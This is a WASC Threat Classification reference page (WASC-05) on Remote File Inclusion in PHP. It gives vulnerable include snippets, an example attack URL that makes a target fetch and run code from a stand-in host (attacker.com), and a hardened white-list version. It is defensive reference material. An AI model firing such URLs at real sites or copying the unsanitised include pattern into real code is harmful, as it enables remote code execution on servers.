 

Remote File Inclusion

Page history last edited by Robert Auger 14 years, 11 months ago

Project: WASC Threat Classification

Threat Type: Attack

Reference ID: WASC-05

 


Remote File Include (RFI) is an attack technique used to exploit "dynamic file include" mechanisms in web applications. When a web application takes user input (URL, parameter value, etc.) and passes it into file include commands, the web application might be tricked into including remote files with malicious code.

 

Almost all web application frameworks support file inclusion. File inclusion is mainly used for packaging common code into separate files that are later referenced by main application modules. When a web application references an include file, the code in this file may be executed implicitly or explicitly by calling specific procedures. If the choice of module to load is based on elements from the HTTP request, the web application might be vulnerable to RFI.

An attacker can use RFI for:

 

  • Running malicious code on the server: any code in the included malicious files will be run by the server. If the file include is not executed using some wrapper, code in include files is executed in the context of the server user. This could lead to a complete system compromise.
  • Running malicious code on clients: the attacker's malicious code can manipulate the content of the response sent to the client. The attacker can embed malicious code in the response that will be run by the client (for example, JavaScript to steal the client session cookies).

 

PHP is particularly vulnerable to RFI attacks due to the extensive use of "file includes" in PHP programming and due to default server configurations that increase susceptibility to an RFI attack ([4,5]).

 

Example

Typically, RFI attacks are performed by setting the value of a request parameter to a URL that refers to a malicious file. Consider the following PHP code:

$incfile = $_REQUEST["file"];
include($incfile.".php");

 

The first line of code extracts the value of the file parameter from the HTTP request. The second line of code dynamically sets the file name to be included using the extracted value. If the web application does not properly sanitize the value of the file parameter (for example, by checking it against a white list), this code can be exploited. Consider the following URL:

 

http://www.target.com/vuln_page.php?file=http://www.attacker.com/malicous

 

In this case the included file name will resolve to:

http://www.attacker.com/malicous.php

Thus, the remote file will be included and any code in it will be run by the server.

In many cases, request parameters are extracted implicitly (when the register_globals variable is set to On). In this case the following code is also vulnerable to the same attack:

 

include($file.".php");

 

Other PHP commands vulnerable to RFI are include_once, fopen, file_get_contents, require and require_once. Additional information on PHP environment variable behavior can be found at [4].
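
The white-list check mentioned above, sketched as a hardened counterpart to the vulnerable include. This is an added example, not code from the WASC page; the page keys, the pages/ directory and the use of $_GET are assumptions made for illustration.

```php
<?php
// Added example (not WASC's code). Page keys and the pages/ directory are hypothetical.
// Defence in depth: keep allow_url_include = Off in php.ini so include/require
// refuse remote URL wrappers such as http:// even if a check like this is missing.

const PAGE_DIR = __DIR__ . '/pages';

// Accepted values of the "file" parameter, mapped to files shipped with the app.
const ALLOWED_PAGES = [
    'home'    => 'home.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];

// Return the local path for an allowed page key, or null for anything else.
function resolve_include($requested): ?string
{
    // file[]=x arrives as an array; reject every non-string value.
    if (!is_string($requested)) {
        return null;
    }
    // Exact key lookup: request data selects an entry but never becomes part of
    // the path, so URLs and ../ sequences have nothing to act on.
    if (!array_key_exists($requested, ALLOWED_PAGES)) {
        return null;
    }
    return PAGE_DIR . '/' . ALLOWED_PAGES[$requested];
}

if (PHP_SAPI === 'cli') {
    // Constructed sample values, including the URL form from the example above.
    $samples = ['about', 'http://www.attacker.com/malicous', '../../etc/passwd', ['about']];
    foreach ($samples as $s) {
        printf("%-40s => %s\n", json_encode($s, JSON_UNESCAPED_SLASHES),
            resolve_include($s) ?? 'REJECTED');
    }
} else {
    // Web request: read only the query string, default to the home page.
    $path = resolve_include($_GET['file'] ?? 'home');
    if ($path === null) {
        http_response_code(404);
        exit('Unknown page');
    }
    include $path;
}
```

Run from the command line, the script prints the lookup result for each constructed value; only the key "about" resolves to a path, and the URL, the traversal string and the array are rejected before any include takes place.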

 

References:

[1] Shaun Clowes, "A Study In Scarlet, Exploiting Common Vulnerabilities in PHP Applications", Blackhat Briefings Asia 2001, http://www.securereality.com.au/studyinscarlet.txt

[2] "Malicious File Inclusion", OWASP Top 10, http://www.owasp.org/index.php/Top_10_2007-A3

[3] "Cafelog B2 Blog B2Verifauth.PHP Remote File Include Vulnerability", http://www.securityfocus.com/bid/21749/info

[4] "PHP Runtime Configuration", http://php.net/manual/en/filesystem.configuration.php

[5] "PHP Register Globals", http://php.net/register_globals

[6] "Remote File Inclusion", Wikipedia, http://en.wikipedia.org/wiki/Remote_File_Inclusion

[7] "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP File Inclusion')", http://cwe.mitre.org/data/definitions/98.html
